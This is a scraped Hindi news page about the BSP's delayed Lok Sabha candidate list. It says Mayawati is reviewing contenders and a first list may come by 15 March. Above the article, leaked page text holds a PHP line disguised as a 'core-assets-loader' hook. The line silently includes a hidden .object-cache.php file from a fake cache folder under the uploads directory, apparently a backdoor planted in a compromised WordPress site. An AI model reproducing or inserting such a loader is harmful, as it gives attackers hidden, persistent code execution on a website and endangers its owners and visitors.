add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); BSP Candidates List: बसपा के कैंडिडेट्स की लिस्ट इस दिन हो सकती है जारी, मायावती के पास पहुंचे ये नाम, मंथन जारी – SOCH INDIA
Menu

देश
BSP Candidates List: बसपा के कैंडिडेट्स की लिस्ट इस दिन हो सकती है जारी, मायावती के पास पहुंचे ये नाम, मंथन जारी

nobanner

अमूमन हर लोकसभा चुनाव में सबसे पहले टिकटों का ऐलान करने वाली बहुजन समाज पार्टी की मुखिया मायावती इस बार टिकट बंटवारे में देरी कर रही हैं . इस बार के चुनाव में सबसे पहले समाजवादी पार्टी ने अपने प्रत्याशियों की लिस्ट जारी की. इसके बाद भारतीय जनता पार्टी ने भी अपने 51 प्रत्याशियों की सूची जारी कर दी है. वहीं बहुजन समाज पार्टी की एक भी लिस्ट सामने नहीं आ पाई है . सूत्रों की माने तो बसपा का अपने टिकटों पर मंथन जारी है और 15 मार्च तक पहली लिस्ट आने की उम्मीद है. कांशीराम की जयंती पर बसपा आपकी पहली सूची जारी कर सकती है जिसमे आधी से अधिक सीटों पर एलान संभव है.

बसपा के सूत्रों की माने तो बहुजन समाज पार्टी सुप्रीमो मायावती प्रत्याशियों के चयन को लेकर लगातार बैठक कर रही हैं . इस दौरान मंडल और सेक्टर प्रभारियों से भी उनकी बैठकें हो रही हैं, वहीं मायावती उन दावेदारों को तवज्जो देना चाहती हैं जिन जिन्हें बीते चुनाव में तकरीबन 2 लाख से अधिक वोट मिले हो और जिन सीटों पर ऐसे प्रत्याशी नहीं मिल रहा है, वहां बसपा अपने जोनल कोऑर्डिनेटर को टिकट देने की रणनीति बना रहीं हैं. सूत्रों की माने तो बसपा सुप्रीमो को अब तक अधिकतर दावेदारों की सूची पार्टी पदाधिकारियों द्वारा दी जा चुकी है, जिस पर मायावती का मंथन जारी है.